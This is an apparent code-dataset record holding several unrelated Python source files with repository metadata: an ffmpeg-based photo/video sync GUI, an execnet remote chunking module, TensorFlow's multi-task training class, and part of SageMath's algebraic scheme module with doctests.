Return the ffmpeg parameters for conversion
"""
resp = None
if VIDEO_H265 == codec:
resp = {"params":["-c:v", "libx265", "-acodec", "aac", "-strict", "-2"], "sufixo":"_H265.mp4"}
elif VIDEO_H264 == codec:
resp = {"params":["-c:v", "libx264", "-acodec", "aac", "-strict", "-2"], "sufixo":"_H264.mp4"}
elif VIDEO_VP8 == codec:
resp = {"params":["-c:v", "libvpx", "-b:v", "1M", "-c:a", "libvorbis"], "sufixo":"_VP8.webm"}
elif VIDEO_VP9 == codec:
resp = {"params":["-c:v", "libvpx-vp9", "-b:v", "2M", "-c:a", "libopus"], "sufixo":"_VP9.webm"}
return resp
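# Editor's note (a sketch of intended use, not code from this file): the encode
# step is expected to assemble a command roughly like
#   [get_caminho_ffmpeg(), "-i", origem] + info["params"] + [destino + info["sufixo"]]
# where "origem"/"destino" are placeholder paths and info = get_codec_info(VIDEO_H264).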
def get_caminho_ffmpeg():
"""
Return the path where ffmpeg is installed
"""
app = get_app_settings("caminho_ffmpeg")
return app if app is not None else "ffmpeg"
def get_ffmpeg_features():
"""
Return a list of ffmpeg build features, e.g. --enable-libx264
"""
global g_lista_ffmpeg_features
if g_lista_ffmpeg_features is None:
g_processo_ffmpeg = subprocess.Popen([get_caminho_ffmpeg()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True)
linhas = ""
for line in iter(g_processo_ffmpeg.stdout.readline, ''):
if "--" in line:
linhas = linhas + line
g_processo_ffmpeg.stdout.close()
g_processo_ffmpeg.wait()
g_lista_ffmpeg_features = []
pattern = re.compile("--enable-[^\s]+|disable-[^\s]+")
for m in pattern.finditer(linhas):
g_lista_ffmpeg_features.append(m.group())
return g_lista_ffmpeg_features
# Application constants
VERSAO_APPLICACAO = "v1.0" # Application version
UNIDADES = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'] # Units for the bytes -> SI conversion
DIR_APPLICATION = os.path.dirname(os.path.realpath(__file__)) # Application directory
ARQUIVO_XML_SETTINGS = DIR_APPLICATION + os.sep + "settings.xml" # Application settings file
ARQUIVO_LOG = DIR_APPLICATION + os.sep + "application.log" # Log file
# Video codecs
VIDEO_H265 = "Video H265"
VIDEO_H264 = "Video H264"
VIDEO_VP8 = "Video VP8"
VIDEO_VP9 = "Video VP9"
CODECS_VIDEO = []
# Application global variables
# Note: by convention, global variables are prefixed with 'g_'
g_debug_mode = False # True to show debug messages
# ffmpeg control
g_processo_ffmpeg = None # Instance of the ffmpeg process
g_lista_ffmpeg_features = None # List of ffmpeg build features
# Source file variables
g_leitura_origem_finalizada = False # Signals the end of the source file reading thread
g_lista_arquivos_origem = None # List of files in the source directory
g_dic_info_arquivos_origem = None # Dictionary with information about the source files
# Destination file variables
g_leitura_destino_finalizada = False # Signals the end of the destination file reading thread
g_lista_arquivos_destino = None # Dictionary of destination files keyed by basename
g_dic_mapeamento_dir_destino = {} # Mapping of the destination directories
g_dic_mapeamento_dir_origem = {} # Mapping of the source directories
# Remove the previous log file and create the g_logger
if os.path.isfile(ARQUIVO_LOG):
os.remove(ARQUIVO_LOG)
logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s %(message)s')
logHandler = logging.FileHandler(ARQUIVO_LOG)
g_logger = logging.getLogger('-') # Application logger
g_logger.addHandler(logHandler)
# Read the command-line arguments
try:
opts, args = getopt.getopt(sys.argv[1:], "h", [])
except getopt.GetoptError:
print('photosync.py -h (help)')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print("\nPrograma para sincronização de arquivos")
print("\nUso: photosync.py -h (help)")
print("\nExemplo: ./photosync.py")
sys.exit()
# Force UTF-8 by default (Python 2 only)
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding("utf-8")
if not os.path.isfile(ARQUIVO_XML_SETTINGS):
set_app_settings("dir_destino", str(os.path.expanduser('~')))
set_app_settings("dir_origem", str(os.path.expanduser('~')))
set_app_settings("extensoes_video", "wmv|avi|mpg|3gp|mov|m4v|mts|mp4")
set_app_settings("extensoes_foto", "dof|arw|raw|jpg|jpeg|png|nef")
set_app_settings("codec_video", "0")
set_app_settings("caminho_ffmpeg", "ffmpeg")
main_window = MainWindow()
# Check that ffmpeg is available
if not spawn.find_executable(get_caminho_ffmpeg()):
info = InputDialog(main_window, 'Informe o caminho para o ffmpeg', '', None).show_and_get_info()
if info is None or not spawn.find_executable(info):
print("Não foi possível encontrar o aplicativo necessário ffmpeg.")
print("Verifique a configuração do caminho do ffmpeg no arquivo settings.xml")
print("A configuração atual é: " + get_caminho_ffmpeg())
sys.exit(2)
else:
set_app_settings("caminho_ffmpeg", info)
# Offer codec options according to the ffmpeg build features
if "--enable-libx264" in get_ffmpeg_features():
CODECS_VIDEO.append(VIDEO_H264)
if "--enable-libx265" in get_ffmpeg_features():
CODECS_VIDEO.append(VIDEO_H265)
if "--enable-libvpx" in get_ffmpeg_features():
CODECS_VIDEO.append(VIDEO_VP8)
CODECS_VIDEO.append(VIDEO_VP9)
# Calling GObject.threads_init() is not needed for PyGObject 3.10.2+
GObject.threads_init()
# Monta a UI
main_window.connect('delete-event', on_close)
main_window.show_all()
Gtk.main()
| 38.100866 | 234 | 0.625392 |
4a1b5ba7038cada01ca5630ec897fd02f2afb5a3
| 233 |
py
|
Python
|
Module 2/Chapter 8/7853OS_08_Codes/remote_chunk.py
|
PacktPublishing/Natural-Language-Processing-Python-and-NLTK
|
bb7fd9a3071b4247d13accfbf0a48eefec76e925
|
[
"MIT"
] | 50 |
2016-12-11T13:49:01.000Z
|
2022-03-20T19:47:55.000Z
|
Module 2/Chapter 8/7853OS_08_Codes/remote_chunk.py
|
PacktPublishing/Natural-Language-Processing-Python-and-NLTK
|
bb7fd9a3071b4247d13accfbf0a48eefec76e925
|
[
"MIT"
] | null | null | null |
Module 2/Chapter 8/7853OS_08_Codes/remote_chunk.py
|
PacktPublishing/Natural-Language-Processing-Python-and-NLTK
|
bb7fd9a3071b4247d13accfbf0a48eefec76e925
|
[
"MIT"
] | 40 |
2017-06-14T14:02:48.000Z
|
2021-10-14T06:25:00.000Z
|
import pickle
if __name__ == '__channelexec__':
tagger = pickle.loads(channel.receive())
chunker = pickle.loads(channel.receive())
for sent in channel:
tree = chunker.parse(tagger.tag(sent))
channel.send(pickle.dumps(tree))
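# Editor's sketch (not part of the original module): this file is written for
# execnet's remote_exec protocol. The parent side is assumed to drive it roughly
# as below, where my_tagger and my_chunker are placeholders for any picklable
# objects exposing .tag() and .parse():
#   import execnet, pickle, remote_chunk
#   gw = execnet.makegateway()
#   channel = gw.remote_exec(remote_chunk)
#   channel.send(pickle.dumps(my_tagger))
#   channel.send(pickle.dumps(my_chunker))
#   channel.send(['This', 'is', 'a', 'test'])
#   tree = pickle.loads(channel.receive())
#   gw.exit()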
| 25.888889 | 42 | 0.733906 |
4a1b5d07bf6c0d2356b8046f15eac4953e561f64
| 5,938 |
py
|
Python
|
official/modeling/multitask/multitask.py
|
wnorris/models
|
a5e4965d1f4e4b02d51aa344336b6fff53af7c17
|
[
"Apache-2.0"
] | 1 |
2020-09-14T10:46:07.000Z
|
2020-09-14T10:46:07.000Z
|
official/modeling/multitask/multitask.py
|
wnorris/models
|
a5e4965d1f4e4b02d51aa344336b6fff53af7c17
|
[
"Apache-2.0"
] | null | null | null |
official/modeling/multitask/multitask.py
|
wnorris/models
|
a5e4965d1f4e4b02d51aa344336b6fff53af7c17
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental MultiTask base class for multi-task training/evaluation."""
import abc
from typing import Dict, List, Optional, Text, Union
import tensorflow as tf
from official.core import base_task
from official.core import config_definitions
from official.core import task_factory
from official.modeling import optimization
from official.modeling.multitask import base_model
from official.modeling.multitask import configs
from official.modeling.privacy import configs as dp_configs
OptimizationConfig = optimization.OptimizationConfig
RuntimeConfig = config_definitions.RuntimeConfig
DifferentialPrivacyConfig = dp_configs.DifferentialPrivacyConfig
class MultiTask(tf.Module, metaclass=abc.ABCMeta):
"""A multi-task class to manage multiple tasks."""
def __init__(self,
tasks: Union[Dict[Text, base_task.Task], List[base_task.Task]],
task_weights: Optional[Dict[str, Union[float, int]]] = None,
task_eval_steps: Optional[Dict[str, int]] = None,
name: Optional[str] = None):
"""MultiTask initialization.
Args:
tasks: a list or a flat dict of Task.
task_weights: a dict of (task, task weight), task weight can be applied
directly during loss summation in a joint backward step, or it can be
used to sample task among interleaved backward step.
task_eval_steps: a dict of (task, eval steps).
name: the instance name of a MultiTask object.
"""
super().__init__(name=name)
if isinstance(tasks, list):
self._tasks = {}
for task in tasks:
if task.name in self._tasks:
raise ValueError("Duplicated tasks found, task.name is %s" %
task.name)
self._tasks[task.name] = task
elif isinstance(tasks, dict):
self._tasks = tasks
else:
raise ValueError("The tasks argument has an invalid type: %s" %
type(tasks))
self.task_eval_steps = task_eval_steps or {}
self._task_weights = task_weights or {}
self._task_weights = dict([
(name, self._task_weights.get(name, 1.0)) for name in self.tasks
])
@classmethod
def from_config(cls, config: configs.MultiTaskConfig, logging_dir=None):
tasks = {}
task_eval_steps = {}
task_weights = {}
for task_routine in config.task_routines:
task_name = task_routine.task_name or task_routine.task_config.name
tasks[task_name] = task_factory.get_task(
task_routine.task_config, logging_dir=logging_dir, name=task_name)
task_eval_steps[task_name] = task_routine.eval_steps
task_weights[task_name] = task_routine.task_weight
return cls(
tasks, task_eval_steps=task_eval_steps, task_weights=task_weights)
@property
def tasks(self):
return self._tasks
def task_weight(self, task_name):
return self._task_weights[task_name]
@property
def task_weights(self):
return self._task_weights
@classmethod
def create_optimizer(cls,
optimizer_config: OptimizationConfig,
runtime_config: Optional[RuntimeConfig] = None,
dp_config: Optional[DifferentialPrivacyConfig] = None):
return base_task.Task.create_optimizer(
optimizer_config=optimizer_config, runtime_config=runtime_config,
dp_config=dp_config)
def joint_train_step(self, task_inputs,
multi_task_model: base_model.MultiTaskBaseModel,
optimizer: tf.keras.optimizers.Optimizer, task_metrics,
**kwargs):
"""The joint train step.
Args:
task_inputs: a dictionary of task names and per-task features.
multi_task_model: a MultiTaskBaseModel instance.
optimizer: a tf.optimizers.Optimizer.
task_metrics: a dictionary of task names and per-task metrics.
**kwargs: other arguments to pass through.
Returns:
A dictionary of losses, including per-task losses and their weighted sum.
"""
losses = {}
with tf.GradientTape() as tape:
total_loss = 0.0
for name, model in multi_task_model.sub_tasks.items():
inputs = task_inputs[name]
if isinstance(inputs, tuple) and len(inputs) == 2:
features, labels = inputs
elif isinstance(inputs, dict):
features, labels = inputs, inputs
else:
raise ValueError("The iterator output is neither a tuple nor a "
"dictionary. It is not implemented to support "
"such outputs.")
outputs = model(features, training=True)
task_loss = self.tasks[name].build_losses(labels, outputs)
task_weight = self.task_weight(name)
total_loss += task_weight * task_loss
losses[name] = task_loss
self.tasks[name].process_metrics(task_metrics[name], labels, outputs,
**kwargs)
# Scales loss as the default gradients allreduce performs sum inside
# the optimizer.
scaled_loss = total_loss / tf.distribute.get_strategy(
).num_replicas_in_sync
tvars = multi_task_model.trainable_variables
grads = tape.gradient(scaled_loss, tvars)
optimizer.apply_gradients(list(zip(grads, tvars)))
losses["total_loss"] = total_loss
return losses
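# Editor's note (illustrative numbers, not from the original file): with
# task_weights={"cls": 2.0, "seg": 1.0}, a step where the per-task losses are
# cls=0.4 and seg=1.0 accumulates total_loss = 2.0 * 0.4 + 1.0 * 1.0 = 1.8
# before the per-replica scaling applied above.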
| 39.586667 | 79 | 0.683563 |
4a1b5de0c045030eb3f74ad30b38cdfd4bc7a759
| 556 |
py
|
Python
|
create_linear_topo.py
|
kboutarel/DAMIT
|
dcf8350d2afc76c84831ff42bf95bd9992df35c5
|
[
"Apache-2.0"
] | 5 |
2017-12-30T12:11:08.000Z
|
2021-01-16T01:28:12.000Z
|
create_linear_topo.py
|
kboutarel/DAMIT
|
dcf8350d2afc76c84831ff42bf95bd9992df35c5
|
[
"Apache-2.0"
] | 4 |
2017-12-31T12:17:52.000Z
|
2018-04-23T16:28:50.000Z
|
create_linear_topo.py
|
kboutarel/DAMIT
|
dcf8350d2afc76c84831ff42bf95bd9992df35c5
|
[
"Apache-2.0"
] | 5 |
2017-03-22T22:29:27.000Z
|
2018-12-15T15:12:38.000Z
|
#!/usr/bin/env python2
import sys
def write_topo(num_switches):
with open("topo.txt", "w") as t:
t.write("switches %d\n" % num_switches)
t.write("outer_hosts 1\n")
t.write("inner_hosts 1\n")
for i in xrange(1, num_switches+1):
if i == 1:
t.write("o1 s1\n")
if i == num_switches:
t.write("s%s i1\n" % i)
else:
t.write("s%s s%s\n" % (i, i+1))
if __name__ == "__main__":
num_switches = int(sys.argv[1])
write_topo(num_switches)
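# Editor's worked example (assumed invocation): running
#   ./create_linear_topo.py 3
# is expected to produce a topo.txt containing
#   switches 3
#   outer_hosts 1
#   inner_hosts 1
#   o1 s1
#   s1 s2
#   s2 s3
#   s3 i1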
| 26.47619 | 47 | 0.510791 |
4a1b5e9b03d05d46da6e028167127b63cdb9b5d5
| 76,619 |
py
|
Python
|
src/sage/schemes/generic/algebraic_scheme.py
|
Ivo-Maffei/DistanceRegular
|
d4dedd5c3e7da73111168fcce60d1f180fe24019
|
[
"BSL-1.0"
] | 1 |
2020-05-19T22:34:03.000Z
|
2020-05-19T22:34:03.000Z
|
src/sage/schemes/generic/algebraic_scheme.py
|
Ivo-Maffei/DistanceRegular
|
d4dedd5c3e7da73111168fcce60d1f180fe24019
|
[
"BSL-1.0"
] | null | null | null |
src/sage/schemes/generic/algebraic_scheme.py
|
Ivo-Maffei/DistanceRegular
|
d4dedd5c3e7da73111168fcce60d1f180fe24019
|
[
"BSL-1.0"
] | 3 |
2020-03-29T17:13:36.000Z
|
2021-05-03T18:11:28.000Z
|
r"""
Algebraic schemes
An algebraic scheme is defined by a set of polynomials in some
suitable affine or projective coordinates. Possible ambient spaces are
* Affine spaces (:class:`AffineSpace
<sage.schemes.affine.affine_space.AffineSpace_generic>`),
* Projective spaces (:class:`ProjectiveSpace
<sage.schemes.projective.projective_space.ProjectiveSpace_ring>`), or
* Toric varieties (:class:`ToricVariety
<sage.schemes.toric.variety.ToricVariety_field>`).
Note that while projective spaces are of course toric varieties themselves,
they are implemented differently in Sage due to efficiency considerations.
You still can create a projective space as a toric variety if you wish.
In the following, we call the corresponding subschemes affine
algebraic schemes, projective algebraic schemes, or toric algebraic
schemes. In the future other ambient spaces, perhaps by means of
gluing relations, may be introduced.
Generally, polynomials `p_0, p_1, \dots, p_n` define an ideal
`I=\left<p_0, p_1, \dots, p_n\right>`. In the projective and toric case, the
polynomials (and, therefore, the ideal) must be homogeneous. The
associated subscheme `V(I)` of the ambient space is, roughly speaking,
the subset of the ambient space on which all polynomials vanish simultaneously.
.. WARNING::
You should not construct algebraic scheme objects directly. Instead, use
``.subscheme()`` methods of ambient spaces. See below for examples.
EXAMPLES:
We first construct the ambient space, here the affine space `\QQ^2`::
sage: A2 = AffineSpace(2, QQ, 'x, y')
sage: A2.coordinate_ring().inject_variables()
Defining x, y
Now we can write polynomial equations in the variables `x` and `y`. For
example, one equation cuts out a curve (a one-dimensional subscheme)::
sage: V = A2.subscheme([x^2+y^2-1]); V
Closed subscheme of Affine Space of dimension 2
over Rational Field defined by:
x^2 + y^2 - 1
sage: V.dimension()
1
Here is a more complicated example in a projective space::
sage: P3 = ProjectiveSpace(3, QQ, 'x')
sage: P3.inject_variables()
Defining x0, x1, x2, x3
sage: Q = matrix([[x0, x1, x2], [x1, x2, x3]]).minors(2); Q
[-x1^2 + x0*x2, -x1*x2 + x0*x3, -x2^2 + x1*x3]
sage: twisted_cubic = P3.subscheme(Q)
sage: twisted_cubic
Closed subscheme of Projective Space of dimension 3
over Rational Field defined by:
-x1^2 + x0*x2,
-x1*x2 + x0*x3,
-x2^2 + x1*x3
sage: twisted_cubic.dimension()
1
Note that there are 3 equations in the 3-dimensional ambient space,
yet the subscheme is 1-dimensional. One can show that it is not
possible to eliminate any of the equations, that is, the twisted cubic
is **not** a complete intersection of two polynomial equations.
Let us look at one affine patch, for example the one where `x_0=1` ::
sage: patch = twisted_cubic.affine_patch(0)
sage: patch
Closed subscheme of Affine Space of dimension 3
over Rational Field defined by:
-x1^2 + x2,
-x1*x2 + x3,
-x2^2 + x1*x3
sage: patch.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 3
over Rational Field defined by:
-x1^2 + x2,
-x1*x2 + x3,
-x2^2 + x1*x3
To: Closed subscheme of Projective Space of dimension 3
over Rational Field defined by:
x1^2 - x0*x2,
x1*x2 - x0*x3,
x2^2 - x1*x3
Defn: Defined on coordinates by sending (x1, x2, x3) to
(1 : x1 : x2 : x3)
AUTHORS:
- David Kohel (2005): initial version.
- William Stein (2005): initial version.
- Andrey Novoseltsev (2010-05-17): subschemes of toric varieties.
- Volker Braun (2010-12-24): documentation of schemes and
refactoring. Added coordinate neighborhoods and is_smooth()
- Ben Hutz (2014): subschemes of Cartesian products of projective space
- Ben Hutz (2017): split subschemes types into respective folders
"""
from __future__ import absolute_import
# ****************************************************************************
# Copyright (C) 2010 Volker Braun <vbraun.name@gmail.com>
# Copyright (C) 2005 David Kohel <kohel@maths.usyd.edu.au>
# Copyright (C) 2010 Andrey Novoseltsev <novoselt@gmail.com>
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
#*** A quick overview over the class hierarchy:
# class AlgebraicScheme(scheme.Scheme)
# class AlgebraicScheme_subscheme
# class AlgebraicScheme_subscheme_affine
# class AlgebraicScheme_subscheme_projective
# class AlgebraicScheme_subscheme_toric
# class AlgebraicScheme_subscheme_affine_toric
# class AlgebraicScheme_quasi
from sage.categories.number_fields import NumberFields
from sage.rings.all import ZZ, QQbar
from sage.rings.ideal import is_Ideal
from sage.rings.rational_field import is_RationalField
from sage.rings.finite_rings.finite_field_constructor import is_FiniteField
from sage.rings.number_field.order import is_NumberFieldOrder
from sage.misc.latex import latex
from sage.misc.misc import is_iterator
from sage.structure.all import Sequence
from sage.structure.richcmp import richcmp, richcmp_method
from sage.calculus.functions import jacobian
from sage.arith.all import gcd, lcm
import sage.schemes.affine
from . import ambient_space
from . import scheme
#*******************************************************************
def is_AlgebraicScheme(x):
"""
Test whether ``x`` is an algebraic scheme.
INPUT:
- ``x`` -- anything.
OUTPUT:
Boolean. Whether ``x`` is an algebraic scheme, that is, a
subscheme of an ambient space over a ring defined by polynomial
equations.
EXAMPLES::
sage: A2 = AffineSpace(2, QQ, 'x, y')
sage: A2.coordinate_ring().inject_variables()
Defining x, y
sage: V = A2.subscheme([x^2+y^2]); V
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 + y^2
sage: from sage.schemes.generic.algebraic_scheme import is_AlgebraicScheme
sage: is_AlgebraicScheme(V)
True
Affine space is itself not an algebraic scheme, though the closed
subscheme defined by no equations is::
sage: from sage.schemes.generic.algebraic_scheme import is_AlgebraicScheme
sage: is_AlgebraicScheme(AffineSpace(10, QQ))
False
sage: V = AffineSpace(10, QQ).subscheme([]); V
Closed subscheme of Affine Space of dimension 10 over Rational Field defined by:
(no polynomials)
sage: is_AlgebraicScheme(V)
True
We create a more complicated closed subscheme::
sage: A,x = AffineSpace(10, QQ).objgens()
sage: X = A.subscheme([sum(x)]); X
Closed subscheme of Affine Space of dimension 10 over Rational Field defined by:
x0 + x1 + x2 + x3 + x4 + x5 + x6 + x7 + x8 + x9
sage: is_AlgebraicScheme(X)
True
::
sage: is_AlgebraicScheme(QQ)
False
sage: S = Spec(QQ)
sage: is_AlgebraicScheme(S)
False
"""
return isinstance(x, AlgebraicScheme)
#*******************************************************************
class AlgebraicScheme(scheme.Scheme):
"""
An algebraic scheme presented as a subscheme in an ambient space.
This is the base class for all algebraic schemes, that is, schemes
defined by equations in affine, projective, or toric ambient
spaces.
"""
def __init__(self, A):
"""
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme
sage: P = ProjectiveSpace(3, ZZ)
sage: P.category()
Category of schemes over Integer Ring
sage: S = AlgebraicScheme(P); S
Subscheme of Projective Space of dimension 3 over Integer Ring
sage: S.category()
Category of schemes over Integer Ring
"""
if not ambient_space.is_AmbientSpace(A):
raise TypeError("A (=%s) must be an ambient space")
self.__A = A
self.__divisor_group = {}
scheme.Scheme.__init__(self, A.base_scheme())
def _latex_(self):
"""
Return a LaTeX representation of this algebraic scheme.
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme
sage: P = ProjectiveSpace(3, ZZ)
sage: S = AlgebraicScheme(P); S
Subscheme of Projective Space of dimension 3 over Integer Ring
sage: S._latex_()
'\\text{Subscheme of } {\\mathbf P}_{\\Bold{Z}}^3'
"""
return "\text{Subscheme of } %s" % latex(self.__A)
def is_projective(self):
"""
Return True if self is presented as a subscheme of an ambient
projective space.
OUTPUT:
Boolean.
EXAMPLES::
sage: PP.<x,y,z,w> = ProjectiveSpace(3,QQ)
sage: f = x^3 + y^3 + z^3 + w^3
sage: R = f.parent()
sage: I = [f] + [f.derivative(zz) for zz in PP.gens()]
sage: V = PP.subscheme(I)
sage: V.is_projective()
True
sage: AA.<x,y,z,w> = AffineSpace(4,QQ)
sage: V = AA.subscheme(I)
sage: V.is_projective()
False
Note that toric varieties are implemented differently than
projective spaces. This is why this method returns ``False``
for toric varieties::
sage: PP.<x,y,z,w> = toric_varieties.P(3)
sage: V = PP.subscheme(x^3 + y^3 + z^3 + w^3)
sage: V.is_projective()
False
"""
return self.ambient_space().is_projective()
def coordinate_ring(self):
"""
Return the coordinate ring of this algebraic scheme. The
result is cached.
OUTPUT:
The coordinate ring. Usually a polynomial ring, or a quotient
thereof.
EXAMPLES::
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x-y, x-z])
sage: S.coordinate_ring()
Quotient of Multivariate Polynomial Ring in x, y, z over Integer Ring by the ideal (x - y, x - z)
"""
try:
return self._coordinate_ring
except AttributeError:
R = self.__A.coordinate_ring()
I = self.defining_ideal()
Q = R.quotient(I)
self._coordinate_ring = Q
return Q
def ambient_space(self):
"""
Return the ambient space of this algebraic scheme.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, GF(5))
sage: S = A.subscheme([])
sage: S.ambient_space()
Affine Space of dimension 2 over Finite Field of size 5
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x-y, x-z])
sage: S.ambient_space() is P
True
"""
return self.__A
def embedding_morphism(self):
r"""
Return the default embedding morphism of ``self``.
If the scheme `Y` was constructed as a neighbourhood of a
point `p \in X`, then :meth:`embedding_morphism` returns a
local isomorphism `f:Y\to X` around the preimage point
`f^{-1}(p)`. The latter is returned by
:meth:`embedding_center`.
If the algebraic scheme `Y` was not constructed as a
neighbourhood of a point, then the embedding in its
:meth:`ambient_space` is returned.
OUTPUT:
A scheme morphism whose
:meth:`~morphism.SchemeMorphism.domain` is ``self``.
* By default, it is the tautological embedding into its own
ambient space :meth:`ambient_space`.
* If the algebraic scheme (which itself is a subscheme of an
auxiliary :meth:`ambient_space`) was constructed as a patch
or neighborhood of a point then the embedding is the
embedding into the original scheme.
* A ``NotImplementedError`` is raised if the construction of
the embedding morphism is not implemented yet.
EXAMPLES::
sage: A2.<x,y> = AffineSpace(QQ,2)
sage: C = A2.subscheme(x^2+y^2-1)
sage: C.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
x^2 + y^2 - 1
To: Affine Space of dimension 2 over Rational Field
Defn: Defined on coordinates by sending (x, y) to
(x, y)
sage: P1xP1.<x,y,u,v> = toric_varieties.P1xP1()
sage: P1 = P1xP1.subscheme(x-y)
sage: P1.embedding_morphism()
Scheme morphism:
From: Closed subscheme of 2-d CPR-Fano toric variety covered
by 4 affine patches defined by:
x - y
To: 2-d CPR-Fano toric variety covered by 4 affine patches
Defn: Defined on coordinates by sending [x : y : u : v] to
[y : y : u : v]
So far, the embedding was just in the own ambient space. Now a
bit more interesting examples::
sage: P2.<x,y,z> = ProjectiveSpace(QQ,2)
sage: X = P2.subscheme((x^2-y^2)*z)
sage: p = (1,1,0)
sage: nbhd = X.neighborhood(p)
sage: nbhd
Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
-y^2*z - 2*y*z
Note that `p=(1,1,0)` is a singular point of `X`. So the
neighborhood of `p` is not just affine space. The
:meth:`neighborhood` method returns a presentation of
the neighborhood as a subscheme of an auxiliary 2-dimensional
affine space::
sage: nbhd.ambient_space()
Affine Space of dimension 2 over Rational Field
But its :meth:`embedding_morphism` is not into this auxiliary
affine space, but the original subscheme `X`::
sage: nbhd.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 2 over Rational Field defined by:
-y^2*z - 2*y*z
To: Closed subscheme of Projective Space of dimension 2 over Rational Field defined by:
x^2*z - y^2*z
Defn: Defined on coordinates by sending (y, z) to
(1 : y + 1 : z)
A couple more examples::
sage: patch1 = P1xP1.affine_patch(1)
sage: patch1
2-d affine toric variety
sage: patch1.embedding_morphism()
Scheme morphism:
From: 2-d affine toric variety
To: 2-d CPR-Fano toric variety covered by 4 affine patches
Defn: Defined on coordinates by sending [y : u] to
[1 : y : u : 1]
sage: subpatch = P1.affine_patch(1)
sage: subpatch
Closed subscheme of 2-d affine toric variety defined by:
-y + 1
sage: subpatch.embedding_morphism()
Scheme morphism:
From: Closed subscheme of 2-d affine toric variety defined by:
-y + 1
To: Closed subscheme of 2-d CPR-Fano toric variety covered
by 4 affine patches defined by:
x - y
Defn: Defined on coordinates by sending [y : u] to
[1 : y : u : 1]
"""
if '_embedding_morphism' in self.__dict__:
hom = self._embedding_morphism
if isinstance(hom, tuple):
raise hom[0]
return hom
ambient = self.ambient_space()
return self.hom(self.coordinate_ring().gens(), ambient)
def embedding_center(self):
r"""
Return the distinguished point, if there is any.
If the scheme `Y` was constructed as a neighbourhood of a
point `p \in X`, then :meth:`embedding_morphism` returns a
local isomorphism `f:Y\to X` around the preimage point
`f^{-1}(p)`. The latter is returned by
:meth:`embedding_center`.
OUTPUT:
A point of ``self``. Raises ``AttributeError`` if there is no
distinguished point, depending on how ``self`` was
constructed.
EXAMPLES::
sage: P3.<w,x,y,z> = ProjectiveSpace(QQ,3)
sage: X = P3.subscheme( (w^2-x^2)*(y^2-z^2) )
sage: p = [1,-1,3,4]
sage: nbhd = X.neighborhood(p); nbhd
Closed subscheme of Affine Space of dimension 3 over Rational Field defined by:
w^2*y^2 - x^2*y^2 + 6*w^2*y - 6*x^2*y + 2*w*y^2 +
2*x*y^2 - 7*w^2 + 7*x^2 + 12*w*y + 12*x*y - 14*w - 14*x
sage: nbhd.embedding_center()
(0, 0, 0)
sage: nbhd.embedding_morphism()(nbhd.embedding_center())
(1/4 : -1/4 : 3/4 : 1)
sage: nbhd.embedding_morphism()
Scheme morphism:
From: Closed subscheme of Affine Space of dimension 3 over Rational Field defined by:
w^2*y^2 - x^2*y^2 + 6*w^2*y - 6*x^2*y + 2*w*y^2 +
2*x*y^2 - 7*w^2 + 7*x^2 + 12*w*y + 12*x*y - 14*w - 14*x
To: Closed subscheme of Projective Space of dimension 3 over Rational Field defined by:
w^2*y^2 - x^2*y^2 - w^2*z^2 + x^2*z^2
Defn: Defined on coordinates by sending (w, x, y) to
(w + 1 : x - 1 : y + 3 : 4)
"""
if '_embedding_center' in self.__dict__:
return self._embedding_center
raise AttributeError('This algebraic scheme does not have a designated point.')
def ngens(self):
"""
Return the number of generators of the ambient space of this
algebraic scheme.
EXAMPLES::
sage: A.<x, y> = AffineSpace(2, GF(5))
sage: S = A.subscheme([])
sage: S.ngens()
2
sage: P.<x, y, z> = ProjectiveSpace(2, ZZ)
sage: S = P.subscheme([x-y, x-z])
sage: P.ngens()
3
"""
return self.__A.ngens()
def _repr_(self):
"""
Return a string representation of this algebraic scheme.
TESTS::
sage: from sage.schemes.generic.algebraic_scheme import AlgebraicScheme
sage: P = ProjectiveSpace(3, ZZ)
sage: S = AlgebraicScheme(P); S
Subscheme of Projective Space of dimension 3 over Integer Ring
sage: S._repr_()
'Subscheme of Projective Space of dimension 3 over Integer Ring'
"""
return "Subscheme of %s"%self.__A
def _homset(self, *args, **kwds):
"""
Construct the Hom-set
INPUT:
Same as :class:`sage.schemes.generic.homset.SchemeHomset_generic`.
OUTPUT:
The Hom-set of the ambient space.
EXAMPLES::
sage: P1.<x,y> = toric_varieties.P1()
sage: type(P1.Hom(P1))
<class 'sage.schemes.toric.homset.SchemeHomset_toric_variety_with_category'>
sage: X = P1.subscheme(x-y)
sage: type(X.Hom(X))
<class 'sage.schemes.toric.homset.SchemeHomset_toric_variety_with_category'>
::
sage: P1xP1 = toric_varieties.P1xP1()
sage: P1 = toric_varieties.P1()
sage: P1xP1._homset(P1xP1,P1)
Set of morphisms
From: 2-d CPR-Fano toric variety covered by 4 affine patches
To: 1-d CPR-Fano toric variety covered by 2 affine patches
"""
return self.__A._homset(*args, **kwds)
def _point_homset(self, *args, **kwds):
"""
Construct a point Hom-set. For internal use only.
TESTS::
sage: P2.<x,y,z> = ProjectiveSpace(2, ZZ)
sage: P2._point_homset(Spec(ZZ), P2)
